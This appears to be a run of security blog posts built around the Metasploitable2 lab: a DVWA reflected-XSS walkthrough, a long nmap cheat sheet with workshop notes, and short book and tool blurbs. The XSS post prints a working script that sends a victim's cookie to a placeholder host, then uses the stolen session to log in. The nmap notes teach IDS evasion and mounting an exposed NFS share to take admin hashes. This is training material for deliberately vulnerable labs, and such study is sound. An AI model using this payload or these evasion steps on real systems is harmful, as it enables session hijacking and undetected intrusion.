metasploitable/dvwa - reflected XSS

Reflected Cross Site Scripting attacks, also known as non-persistent attacks, leverage malicious script off of a web application; the attacker makes an http request that includes malaicious data, and then sends the infected url to it’s target.

Burpsuite is a great tool to identify XSS vulnerabilities for web applications. Attackers might very well use the Burp Repeater to test various payloads that issue a request and review the responses in comparison with the initial site response. This allows attackers to gain a better context of where the “reflection” or random value occurs -- which can be within HTML tags, a javascript string, etc. -- and to test for different input validations.

A common defense against non-persistent atttacks is by filtering user inputs and blacklisting or sanitizing specific strings from working. Other defenses include encoding the data output or by placing a Content Security Policy (CSP).

For this demonstration, however, we will use metasploitable2/dvwa, a purposefully vulnerable website application, and will not need Burpsuite to test for reflections and input validations nor have to worry about santized inputs. 

We’ll start off with a simple one!

First launch metasploitable2 vm.  Open a browser and search for your metasploitable ip address; head to the /dvwa/ directory and sign into the login page with the default credentials

Once signed in, head to the “XSS reflected” tab. **Don’t forget to change the DVWA Secruity to “low” if you haven’t already

The site on the XSS Reflected tab gives us a page where we can input text. Let’s test it out. 

Notice how the “pillothecat” request by the client has the response “Hello pillothecat” from the server. This sort of user interaction potentially allows for the XSS vulnerability to be present. This is because a potential attacker might send in a malicious script or script that they shouldn’t be authorized to send.

Hmm. I wonder if we could do something like that for this website?

Let’s test the “ALERT” script -- an alert that generates a pop-up. (Not the most devious I know, but popus can certainly be annoying!)

input: <script>alert(”aaHH”)</script>

** even if you don’t understand scripting language, that’s okay! There are plenty of open source scripts that you can find, but do try to understand the context of each variable. We can clearly see that the boundaries of the script (<script>,</script>), the command alert, followed by the string_of_text we want to popup.

Go ahead and enter the script and notice that annoying popup.

Now look over to your url. Do you see that same script as you inputted in the url query parameter?

Maybe it looks a little different, and that’s okay because the script is now in url encoding. But either way, this url can now be sent to a target so that they see the same annoying pop up that we’ve scripted.

Now imagine a more nefarious script that we can inject into a url request.

Let’s say, for example, stealing our target’s cookies.

Much like the alert popup, we will need to inject a code that the user will then interact with. Ideally this script might be hidden away so that the user won’t suspect anything. For example, a script might be within the code of an image of a popular cat meme; when the catchy meme is shared among friends, unbeknowst to the user(s) the forwarded image also runs a script to request for the their cookie information to be sent to the hacker.

Pretty terrifying!! But don’t worry, today we’ll skip over hiding our script and instead simply inject it into the same input box we did earlier.

Here’s the script to acquire the cookie information: *** don’t forget to replace the “IP_ADDRESS” with where you want the information to be sent.

<SCRIPT> var i = new Image(); i.src="http://IP_ADDRESS/" + document.cookie.split('; ')[1];</SCRIPT>

Now before you hit the submit, lets open our terminal and listen in on the request through netcat.

Now hit submit and let’s see what we pick up from our terminal.

Let’s take a close look at the PHPSESSID row. In PHP applications, the user’s session IDs and its cookies are stored in the PHPSESSID. Cookies are saved characters for a user’s web app request -- they store user information like passwords, search preferences, etc. Now that we have our target’s cookie, we can use the cookie as a means of accessing a site with the target’s credential.

Let’s test it out!

In a new browser, go to the /dvwa/ home page.

http://”METASPLOITABLE2_IP_ADDRESS”/dvwa/index.php

Notice how the site redirects you to the /login.php; this is because we don’t have the proper credentials yet to access the home page.

In order to change this, we can head to “Web Developer” --> “Storage Inspector”, from our browser setting.

Under “Cookies”, change the “PHPSESSID” Value with the value we intercepted from our target.

Now try refreshing the page with the correct home page site (/dvwa/index.php), if you are still on the login page.

ANNNNND we have succesfully logged in with our target’s cookie!!!

nice~~

..

.

WELL, not really nice... obviously, this can be extremely dangerous!!!

If there’s one important takeaway from all this, it is that you should ALWAYS check the links that you click.

Don’t forget, the vulnerability here is the user interaction that triggers the script in the first place. So, watch out for those phishing emails, go only on trusted sites, and of course, HACK ETHICALLY =D

hacker bitch bridge my network pointto point and now i cant find my default ip address for my lol and im wiping all my computers bitch! #ihatehackers🚫 #ihatehackers #linux #metasploitable2 #metasploitframework

The Green Girl is learning about leveraging the vsftpd back door in her Cisco #CCNACyberOps course using Metasploitable 2

Hacking Cheat Sheets Part 1: Nmap

Here’s a cheat sheet I made for some common nmap commands, the formatting was a bit off so if you see a bullet point that starts with an f, its supposed to be an @ symbol.

nmap:

* The following command checks the state of the most popular ports on the host scanme.nmap.org by launching a TCP port scan:$ nmap scanme.nmap.org

* Nmap begins by converting the hostname to an IPv4 address using DNS. If you wish to use a different DNS server, use --dns-servers <serv1[,serv2],...>, or use -n if you wish to skip this step, as follows:$ nmap --dns-servers 8.8.8.8,8.8.4.4 scanme.nmap.org

* Afterwards, it pings the target address to check if the host is alive. To skip this step use –PN as follows:$ nmap -PN scanme.nmap.org

* Nmap then converts the IPv4 address back to a hostname by using a reverse DNS call. Use -n to skip this step as follows:$ nmap -n scanme.nmap.org

* Finally, it launches a TCP port scan. To specify a different port range, use -p[1-65535], or -p- for all possible TCP ports, as shown in the following command:$ nmap -p1-30 scanme.nmap.org

* Nmap categorizes ports into the following states: 1. Open: This indicates that an application is listening for connections on this port 2. Closed: This indicates that the probes were received but there is no application listening on this port 3. Filtered: This indicates that the probes were not received and the state could not be established. It also indicates that the probes are being dropped by some kind of filtering 4. Unfiltered: This indicates that the probes were received but a state could not be established 5. Open/Filtered: This indicates that the port was filtered or open but Nmap couldn't establish the state 6. Closed/Filtered: This indicates that the port was filtered or closed but Nmap couldn't establish the state.

* Version detection is one of the most popular features of Nmap. Knowing the exact version of a service is highly valuable for penetration testers who use this service to look for security vulnerabilities, and for system administrators who wish to monitor their networks for any unauthorized changes. Fingerprinting a service may also reveal additional information about a target, such as available modules and specific protocol information.

* $ nmap -sV scanme.nmap.org

* This feature basically works by sending different probes from nmap-service-probes to the list of suspected open ports. The probes are selected based on how likely it is that they can be used to identify a service.There is very detailed documentation on how the service detection mode works, and the file formats used, at http://nmap.org/book/vscan.html

* Nmap has a special flag to activate aggressive detection, namely -A. Aggressive mode enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (--traceroute). Needless to say this mode sends a lot more probes and it is more likely to be detected, but provides a lot of valuable host information. You can see this by using one of the following commands:# nmap -A <target>

* Finding live hosts in a network is often used by penetration testers to enumerate active targets, and by system administrators to count or monitor the number of active hosts. Thi sis a ping scan: $ nmap -sP 192.168.1.1/24

* ARP requests are used when scanning a local Ethernet network as a privileged user, but you can override this behavior by including the flag --send-ip.# nmap -sP --send-ip 192.168.1.1/24

* Ping scanning does not perform port scanning or service detection, but the Nmap Scripting Engine can be enabled for scripts depending on host rules, such as the cases of sniffer-detectand dns-brute.# nmap -sP --script discovery 192.168.1.1/24

* There are situations when a system administrator is looking for infected machines that use a specific port to communicate, or when users are only looking for a specific service or open port and don't really care about the rest. Narrowing down the port ranges used also optimizes performance, which is very important when scanning multiple targets.# nmap -p80 192.168.1.1/24

* There are several accepted formats for the argument -p: f Port list: # nmap -p80,443 localhost f Port range: # nmap -p1-100 localhost f All ports: # nmap -p- localhost f Specific ports by protocols: # nmap -pT:25,U:53 <target> f Service name: # nmap -p smtp <target> f Service name wildcards: # nmap -p smtp* <target> f Only ports registered in Nmap services: # nmap -p[1-65535] <target>

* The argument --scriptsets which NSE scripts should be run with the scan. In this case, when the service scan detects the web server, a parallel thread is initialized for the selected NSE script

* There are more than 230 scripts available, which perform a wide variety of tasks. The NSE script http-title returns the title of the root document if a web server is detected.

* You can run multiple scripts at once: $ nmap --script http-headers,http-title scanme.nmap.org

* f Run all the scripts in the vulncategory: $ nmap -sV --script vuln <target> f Run the scripts in the categories versionor discovery: $ nmap -sV --script="version,discovery" <target> f Run all the scripts except for the ones in the exploitcategory: $ nmap -sV --script "not exploit" <target> f Run all HTTP scripts except http-bruteand http-slowloris: $ nmap -sV --script "(http-*) and not(http-slowloris or httpbrute)" <target>

* To test new scripts, you simply need to copy them to your /scriptsdirectory and run the following command to update the script database:# nmap --script-update-db

* NSE script categories f auth: This category is for scripts related to user authentication. f broadcast: This is a very interesting category of scripts that use broadcast petitions to gather information. f brute: This category is for scripts that help conduct brute-force password auditing. f default: This category is for scripts that are executed when a script scan is executed (-sC). f discovery: This category is for scripts related to host and service discovery. f dos: This category is for scripts related to denial of service attacks. f exploit: This category is for scripts that exploit security vulnerabilities. f external: This category is for scripts that depend on a third-party service. f fuzzer: This category is for NSE scripts that are focused on fuzzing. f intrusive: This category is for scripts that might crash something or generate a lot of network noise. Scripts that system administrators may consider intrusive belong to this category. f malware: This category is for scripts related to malware detection. f safe: This category is for scripts that are considered safe in all situations. f version: This category is for scripts that are used for advanced versioning. f vuln: This category is for scripts related to security vulnerabilities

* how to force Nmap to scan using a specified network interface: $ nmap -e <INTERFACE> scanme.nmap.org

* Scanning profilesare a combination of Nmap arguments that can be used to save time and the need to remember argument names when launching an Nmap scan.This recipe is about adding, editing, and deleting a scanning profile in Zenmap. Let's add a new profile for scanning web servers: 1.  Launch Zenmap. 2.  Click on Profile on the main toolbar. 3.  Click on New Profile or Command(Ctrl+ P). The Profile Editor will be launched. 4.  Enter a profile name and a description on the Profile tab. 5.  Enable Version detection and disable reverse DNS resolution on the Scan tab. 6.  Enable the following scripts on the Scripting tab: ? hostmap ? http-default-accounts ? http-enum ? http-favicon ? http-headers ? http-methods ? http-trace ? http-php-version ? http-robots.txt ? http-title 7.  Next, go to the Target tab and click on Ports to scan and enter 80, 443. 8.  Save your changes by clicking on Save Changes.

After using the editor to create our profile, we are left with the following Nmap command: $ nmap -sV -p 80,443 -T4 -n --script http-default-accounts,httpmethods,http-php-version,http-robots.txt,http-title,http-trace,httpuserdir-enum <target> Using the Profilewizard, we have enabled service scanning (-sV), set the scanning ports to 80and 443, set the Timing template to 4, and selected a bunch of HTTP-related scripts to gather as much information as possible from this web server. And we now have this profile saved for some quick scanning without having to type all these flags and options again. ------------------------------------------------------------------------------------ * nmap workshop on webpownized notes: with this I have metasploitable2 up and running. you can either run netdiscover or -sn switch for nmap to do a host discover and see what you have up and running

1. tcpdump -i eth0 -nn host 10.0.0.100 && host 10.0.0.115   2. this says use interface eth0  with no dns resolve or friendly names (like http instead of port 80) and to specifically monitor these 2 hosts 3. first lets start with a syn scan. You have to be running as root to do this one 4. nmap -p 80 -sS 10.0.0.115 5. note the flags of syn from us and syn/ack from them, then we sent an R rst 6. lets change the -sS to -sT, this is full connect and its what it switches to if your not root 7. note the syn, syn/ack, ack, then reset 8. now if we stuck with these scans they are tcp scans we would be missing out on the goods on udp 9. adding a -sU to the mix will do a udp scan, but this takes a long time. 10. you can decrease the time with -p 1-200 11. also test the firewall state with an ack scan 12. nmap -p 1-200 -sA 10.0.0.115 13. looking at tcpdump we see there was a large amount of ports that responded back with an rst, so we know its listening and responding 14. you can also use the --scanflags <flags> that lets you specify what flag you want set 15. lets do a protocol scan 16. nmap -sO 10.0.0.115 17. this is checking the ip protocol ids to see what the victim supports 18. takes a while so go ahead and ctrl+c it 19. keep in mind you can hit v on your keyboard during the scan to set verbosity limits. D as well for debug info. shift+v and shift+d dials it back down 20. you could have also done it in the command -vvv (the number of v's is the number of verbosity) and -ddd as well 21. so lets just run a basic nmap on metasploitable2 22. nmap 10.0.0.115 23. this shows whats open and what service is running based on the port number. This can be misleading because admins may move services to different ports 24. if you go to /usr/share/nmap/  cat nmap-services | more  you will see what nmap notes as services 25. so lets go deeper with one in particular port 3306. It states its mysql, so lets find out 26. nmap -sV -p 3306 10.0.0.115 27. this gives the whole version number, this is what you would compare online to see if theres a vulnerability for that specific version 28. lets see how these are found out 29. cd /usr/share/nmap  and cat nmap-service-probes | more 30. these will list differnt probes that have data that can be used to compare with the response nmap gets back from a service. Theres a ton of probes here ranging from null scans, bitcoin, antiviruses 31. lets see if we can find the mysql probes (q to quit) 32. cat nmap-service-probes | grep mysql 33. you can also scan the top 1000 services based off of this services text file 34. by adding -F it will scan the top 100 and quick 35. nmap -F 10.0.0.115 36. you can also use --top-ports<number of ports> 37. nmap --top-ports 500 10.0.0.115 38. you can skip port ranges with a comma 39. nmap -p 21-25,27,29 10.0.0.115 40. you can also specify udp or tcp 41. nmap -sS -sU -p U:53,111,137,T:21-25,80 10.0.0.115 42. now try it without the -sU and you will see that although you specified the udp ports, it still doesnt scan them without that -sU switch 43. same thing applies if you just did the -sU and omitted the -sS you will only get the udp ports 44. so run both types of scans if you are going to be specifying udp and tcp ports 45. you can add a -r to have the ports scanned in order not random 46. the file to see how nmap detrmines OS version is /usr/share/nmap/nmap-os-db 47. these are basically patterns, and if the nmap response matches one of these patterns it can determine with good certainty that particular OS 48. so do nmap -O 10.0.0.115 to do the OS scan 49. you tweak these scans as well. Like the --osscan-limit which basically says if you cant detrmine what it is, dont bother. nmap -O --osscan-limit 10.0.0.115 50. --osscan-guess is a more aggressive probe. nmap -O --osscan-guess 10.0.0.115 51. http://nmap.org/book/osdetect-methods.html 52. now lets try to mess with timing 53. you can use --min-hostgroup if you want to specify a number of host groups to scan at a time, theres also --max-hostgroup 54. --max-retries  caps number of port scan probe retransmissions 55. --host-timeout<time> give up on target after this long 56. --scan-delay adjust when i want to send probes 57. there are templates that use these parameters when using the T options

-T<0-5>: Set timing template (higher is faster)

Speed: T1 --------------- Timing report ---------------  hostgroups: min 1, max 100000  rtt-timeouts: init 15000, min 100, max 15000(round trip times)  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000  parallelism: min 0, max 1  max-retries: 10, host-timeout: 0  min-rate: 0, max-rate: 0 ---------------------------------------------

Speed: T2 --------------- Timing report ---------------  hostgroups: min 1, max 100000  rtt-timeouts: init 1000, min 100, max 10000  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000  parallelism: min 0, max 1  max-retries: 10, host-timeout: 0  min-rate: 0, max-rate: 0 ---------------------------------------------

Speed: T3

--------------- Timing report ---------------  hostgroups: min 1, max 100000  rtt-timeouts: init 1000, min 100, max 10000  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000  parallelism: min 0, max 0  max-retries: 10, host-timeout: 0  min-rate: 0, max-rate: 0 ---------------------------------------------

Speed: T4

--------------- Timing report ---------------  hostgroups: min 1, max 100000  rtt-timeouts: init 500, min 100, max 1250  max-scan-delay: TCP 10, UDP 1000, SCTP 10  parallelism: min 0, max 0  max-retries: 6, host-timeout: 0  min-rate: 0, max-rate: 0 ---------------------------------------------

Speed: T5

--------------- Timing report ---------------  hostgroups: min 1, max 100000  rtt-timeouts: init 250, min 50, max 300  max-scan-delay: TCP 5, UDP 1000, SCTP 5  parallelism: min 0, max 0  max-retries: 2, host-timeout: 900000  min-rate: 0, max-rate: 0 ---------------------------------------------

58. T3 is a good balance 59. T1 is good when i dont want to be found by ids, because it takes so much time in between packets 60. nmap -T1 -vvv -dd 10.0.0.115 61. this will take forever so just show students the verbose output of what its doing 62. do the same with the other ones 63. reporting options are many 64. -oN/-oX/-oS/-oG <file> normal,xml,script kiddie, and grepable format in that order. with these ones you need to add the extension to the end of the filename 65. -oA outputs in all major formats simultaneously 66. nmap -oA rays-scan 10.0.0.115 67. make sure you copy over the stylesheet with cp /usr/share/nmap/nmap.xsl /root 68. also give the xml version a minute or so to finish then do firefox rays-scan.xml & 69. you would need to send this xls file along with the xml file if you send it elsewhere 70. --resume will resume an aborted scan if you were outputting this to file at the time

nmap scripting * its based on lua * you can do network discovery, more sophistictaed version detection, vulnerability detection, backdoor detection, some exploitation

* script categories: auth - credentials on a target system broadcast - discovery of hosts not listed on the command line by broadcasting on the local network default - if you write a script for this category it gets run when you do the -A option discovery - discover more info (directory services, snmp, public registries, etc) dos - crash a service exploit - exploit a vulnearbility fuzzer - send server software unexpected input intrusive - high risk, things that can crash services safe - wont crash service version - version detection

The NMAP Scanning Engine (NSE)

1. How to specify which scripts to run. 2. How to use wildcards 3. How scripts work 4. Overview of the scripts available 5. Demonstration of select scripts 6. Discuss some scripts helpful in your job

 -sC: equivalent to --script=default  --script=<Lua scripts>: <Lua scripts> is a comma separated list of directories, script-files or script-categories  --script-args=<n1=v1,[n2=v2,...]>: provide arguments to scripts  --script-args-file=filename: provide NSE script args in a file  --script-trace: Show all data sent and received  --script-updatedb: Update the script database.  --script-help=<Lua scripts>: Show help about scripts.           <Lua scripts> is a comma separated list of script-files or           script-categories. * a good methodology when you start pentesting a network is: PLUG INTO THE NETWORK AND CREATE A SUBNET LIST 1. ifconfig 2. /etc/resolv.conf  this is where their dns servers are listed and a lot of companies tend to put their dns servers in the same subnet as their domain controllers 3. netdiscover 4. wireshark 5. dig PING SCAN TO CREATE LIST OF LIVE IPS 1. nmap -sP -PL SYN SCAN USING TIMING AND OTHER EVASION TECHNIQUES ONE PORT AT A TIME 1. cat hostlist.txt | sort -R | nmap -sS -p 389 -oG myscan -iL-  (sort is so it will go at random so ids wont pick up sequential scans USE NMAP SCRIPTS AGAINST THE HOSTS ONE BY ONE IN EACH PORT.TXT FILE 1. nmap -Pn -n --open -p21 --script ftp-anon,ftp-bounce,ftp-libopie -iL 21.txt

* dont throw a script at a network until you know what it does. find it on nmap.org/nsedoc/scripts/ * help files would be nmap --script-help "ftp-*" * lets do some examples: 1. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p21 --script=banner,ftp-anon,ftp-bounce 10.0.0.115 2. scan delay is delay between each packet, -g spoof the source port (most 53 ports will be let through a firewall), no dns or arp 3. nmap --script-help "ssh-*" also do it without the - to get more scripts 4. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p22 --script=sshv1,ssh2-enum-algos 5. nmap --script-help "smtp-*" 6. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p25 --script=smtp-brute,smtp-enum-users 10.0.0.115 7. nmap --script-help "dns-*" 8. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p53 --script=dns-cache-snoop,dns-service-discovery,dns-update,dns-zone-transfer,dns-recursion 10.0.0.115 9. the dns cache thing is somethinig most dont realize. dns servers love to cache domains, the dns-cache script has about 100 domains like facebook, wikipedia,etc. so modifying the nse for that with other domains 10. cd /usr/share/nmap/scripts   ls -lah | grep dhcp 11. nmap --script=broadcast-dhcp-discover.nse -p67 --open 10.0.0.0/24 12. this one can show me an ip address that can be used by me 13. nmap --script-help "ms-sql-*" 14. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p T:1433,U:1434 --script=ms-sql-info,ms-sql-empty-password 10.0.0.115  can also replace this with mysql to be used against metasploitable 15. nmap --script-help "nfs-*" 16. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p111 --script=rpcinfo,nfs-ls,nfs-showmount,nfs-statfs 10.0.0.115   note the export /  to root. so show the students how this is dangerous by.. 17. mkdir /mnt/raystemp 18. mount -t nfs 10.0.0.115:// /mnt/raystemp/ -o nolock 19. cd /mnt/raystemp/ 20. ls  and look at all the access you have because some let you mount to root 21. the company may have their golden images for their image deployment stored here and you can download it, install it and rip the admin hashes 22. nmap --script-help "smb-*" 23. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p139,445 --script="smb-enum*",smb-os-discovery,smb-security-mode,smb-check-vulns --script-args safe=1 10.0.0.115 24. nmap --script-help "http-*" 25. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p80,443,8000,8080,8443 --script=http-date,http-enum,http-favicon,http-headers,http-open-proxy,http-php-version,http-robots.txt,http-title,http-trace,http-vhosts,http-vmware-path-vuln,citrix-enum-apps-xml,citrix-enum-servers-xml --stats-every 30s 10.0.0.115 26. nmap --script-help "ldap-*" 27. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p389 --script=ldap-rootdse 10.0.0.115 28. nmap --script-help "ssl-*" 29. nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p443 --script=banner,ssl-cert,ssl-enum-ciphers,sslv2,ssl-heartbleed 10.0.0.115 30. by the way the reason for all these scans, is because a lot of the vulnerability scanners out there produce false positives, so by doing these scans its a great secondary scan 31. ip geo location stuff as well can be done from nmap 32. nmap -Pn -p80 --script ip-geolocation-* irongeek.com 33. github has a lot of custom scripts 34. so to install an nse script you download one like https://github.com/SpiderLabs/Nmap-Tools/blob/master/NSE/http-screenshot.nse and then copy it over to /usr/local/share/nmap/scripts/ then after thats done you run nmap --script-updatedb 35. git clone git://github.com/SpiderLabs/Nmap-Tools.git 36. cd Nmap-Tools/NSE/ 37. cp htp-screenshot.nse /usr/share/nmap/scripts 38. nmap --script-updatedb

metasploit and nmap * some of the common database commands are: 1. creds - list all the credentials in the database 2. db_connect - connect to an existing database 3. db_disconnect 4. db_export - export a file containing the contents of the database 5. db_import - import a scan result file 6. db_nmap - executes nmap and records the output automatically 7. db_rebuild_cache rebuilds the database stored module cache 8. db_status 9. hosts - lists all hosts in the database 10. loot - lists all teh loot in the database 11. notes - lists all notes in the database 12. services - lists all the servvices in the db 13. vulns - lists all the vulns 14. workspace - switch between database workspaces

* so you can scan directly into the database when you do nmap by doing : 1. db_nmap -n -A 10.0.0.115 2. now you can type hosts and see what you have for hosts 3. hosts -u this will tell you hosts that responded 4. if you want to only get the info about a certain port it would be services -p 80 -u 5. and when i do metasploit exploit module, i can say services -p 21 -R this automatically sets all the rhosts to this ip. Keep in mind this is only for rhosts not rhost. 6. so do services -p 21 -R 7. then search port scanner and grab the ftpbounce scanner and use the module 8. show options and it should already have the rhosts option set (unset unsets it) 9. workspace -h 10. all the commands for database have help files so hosts -h, services -h, etc. 11. you can also query the database for the differnt columns and such like: 12. hosts -c address,os_flavor 13. hosts -c address,os_flavor -S Linux 14. services -c name,info 10.0.0.115 15. services -S Unr 16. services -c port,proto,state -p 80-82 17. services -s http -c port 10.0.0.115 18. now for exporting: 19. services -s http -c port 10.0.0.115 -o /root/rays.csv 20. hosts -S Linux -o /root/rayshosts.csv

Evasion techniques 1. syn scan is still the best stealthy scan always do one 2. source port manipulation, dns tcp 53, ftp tcp 20, kerberos tcp or udp 88 and dhcp udp 67. the syntax would be --source-port<port number> or -g <port number> 3. this doesnt work with tcp connect scan , dns requests, os version scanning or script scanning 4. fragmentation: -f (fragment packets or --mtu(using the specified mtu). split up the tcp header over several packets to make it harder for packet filters. you can specify this option once and split the packets into eight bytes or less after the ip header. You can specify the -f again to use 16 bytes per fragment. Generally not supported for connect scans, ftp bounce, version detection and scripting engine 5. scan delay: --scan-delay<time> or --max-scan-delay<time>. Wait at least the given amount of time between each probe. Evade threshold based IDS and ips. Nmap tries to detect rate limiting and adjust the scan delay accordingly. A low --max-scan-delay can speed up nmap, most pentesters go with 3 sec 6. decoy scanning: -D <decoy1>,<decoy2> basically your cloaking a scan with decoys. makes it appear to the remote host that the hosts you specify as decoys are scanning the target network too. Thi smakes the scan less obvious to various network monitoring systems. Hosts you use as decoys should be up, and use ip addresses instead of names. Can be defeated through router tracing, response dropping and other active mechanisms. they work with initial ping scan(using icmp,syn,ack), actual port scanning phase and remote OS detection. They do not work with version detection scans or tcp connect scans. 7. data length: --data-length<number> (append random data to sent packets). one way that ids finds that its nmap in play is its default data length signature, thats where this comes into play. tcp packets are generally 40 bytes and icmp echo requests are just 28. Append the given number of random bytes to most of the packets it sends and not to use any protocol-specific payloads. Adds extra padding to the packet making it look less like a scan packet and more like a legit packet 8. another evasion technique is to do several scans of teh target, break your scans  up into chunks of "ports of interest" 9. most ids/ips alert on scans of more than 5 ports 10. layer your source-obfuscation techniques(decoys,timing,fragmentation,data length,etc) 11. keep your scan time to a minimum by breaking scans into multiple jobs

SecGen - Create Randomly Insecure VMs

SecGen - Create Randomly Insecure VMs #capturetheflag #create #CTFChallenges #ExifTool #Insecure #Provisioning

[sc name=”ad_1″]

SecGen creates vulnerable virtual machines, lab environments, and hacking challenges, so students can learn security penetration testing techniques. Boxes like Metasploitable2 are always the same, this project uses Vagrant, Puppet, and Ruby to create randomly vulnerable virtual machines that can be used for learning or for hosting CTF events. The latest version is available at:…

View On WordPress

Kali Linux Network Scanning Cookbook

Kali Linux Network Scanning Cookbook: Over 90 hands-on recipes explaining how to leverage custom scripts and integrated tools in Kali Linux to effectively master network scanning Download Introduction The face of hacking and cyber crime has dramatically transformed over the past couple of decades. At the end of the 20th century, many people had no idea what cyber crime was. Those people thought that hackers were malevolent mathematical geniuses that hid in the dimly lit basements and spoke in binary. But as of late, we have seen the rise of a whole new brand of hackers. Because of the public availability of hacking software and tools, the hacker of the new era could easily be your next-door neighbor, your local gas station attendant, or even your 12-year old child. Script kiddie tools such as the Low Orbit Ion Cannon (LOIC) have been used to launch massive Distributed Denial of Service (DDoS) attacks against large corporations and organizations. This free Windows download merely requires that you enter a target URL, and it also has a graphic interface that bears a striking resemblance to a space age video game. In a world where hacking has become so easy that a child can do it, it is absolutely essential that organizations verify their own level of protection by having their networks tested using the same tools that cyber criminals use against them. But, the basic usage of these tools is not sufficient knowledge to be an effective information security professional. It is absolutely critical that information security professionals understand the techniques that are being employed by these tools, and why these techniques are able to exploit various vulnerabilities in a network or system. A knowledge of the basic underlying principles that explains how these common attack tools work enables one to effectively use them, but more importantly, it also contributes to one's ability to effectively identify such attacks and defend against them. The intention of this book is to enumerate and explain the use of common attack tools that are available in the Kali Linux platform, but more importantly, this book also aims to address the underlying principles that define why these tools work. In addition to addressing the highly functional tools integrated into Kali Linux, we will also create a large number of Python and bash scripts that can be used to perform similar functions and/or to streamline existing tools. Ultimately, the intention of this book is to help forge stronger security professionals through a better understanding of their adversary What this book covers Chapter 1, Getting Started, introduces the underlying principles and concepts that will be used throughout the remainder of the book. Chapter 2, Discovery Scanning, covers techniques and scanning tools that can be used to identify live systems on a target network, by performing layer 2, layer 3, and layer 4 discovery. Chapter 3, Port Scanning, includes techniques and scanning tools that can be used to enumerate running UDP and TCP services on a target system. Chapter 4, Fingerprinting, explains techniques and scanning tools that can be used to identify the operating system and services running on a target system. Chapter 5, Vulnerability Scanning, covers techniques and scanning tools that can be used to identify and enumerate potential vulnerabilities on a target system. Chapter 6, Denial of Service, introduces techniques and attack tools that can be used to exploit denial of service vulnerabilities identified on a target system. Chapter 7, Web Application Scanning, provides techniques and tools that can be used to identify and exploit web application vulnerabilities on a target system. Chapter 8, Automating Kali Tools, introduces scripting techniques that can be used to streamline and automate the use of existing tools in Kali Linux. What you need for this book To follow the exercises addressed in this book or to further explore on your own, you will need the following components: + A single personal computer (Mac, Windows, or Linux) with sufficient resources that can be shared across multiple virtual machines. At minimum, you should have 2 GB of RAM. It is recommended that for optimal performance, you use a system with 8 to 16 GB of RAM. Multiple processors and/or processor cores is also recommended. - If you are running a system with limited resources, try to minimize the number of virtual machines that are running simultaneously when completing the exercises + A virtualization software to run your security lab environment. Some of the available options include the following: - VMware Fusion (Mac OS X) - VMware Player (Windows) - Oracle VirtualBox (Windows, Mac OS X, or Linux) + Multiple operating systems to run in the security lab environment. Acquisition and installation of each of these will be discussed in detail in Chapter 1, Getting Started. The operating systems needed include the following: - Kali Linux - Metasploitable2 - An Ubuntu server - Windows OS (Windows XP SP2 is recommended) Who this book is for This book is intended for the following users: + Information technology professionals + Information security professionals + Casual security or technology enthusiasts The book assumes that the reader has little to no familiarity with penetration testing, Linux, scripting, and TCP/IP networking. Each section in this book initially addresses the underlying principles, prior to discussing the techniques that employ them. Via TimoBook

Hacking’Kali: Penetration testing (meterpreter & metasploitable2 12)

Hacking’Kali: Penetration testing :) (meterpreter & metasploitable2 12) }:)

Captura 1: Final (artículo) :- Hacking’Kali: Penetration testing (metasploit 11) ;)

/_ <"Interacción con Meterpreter">; #. <"Meterpreter"> es un "Payload" o "Carga Útil <avanzada>", <dinámico> y <ampliable> que "utiliza <actores> de <inyección DLL> en memoria" y se "extiende sobre la <red> en tiempo de <ejecución>". Este se "comunica" sobre un "actor <socket>" y "proporciona" una <completa

View On WordPress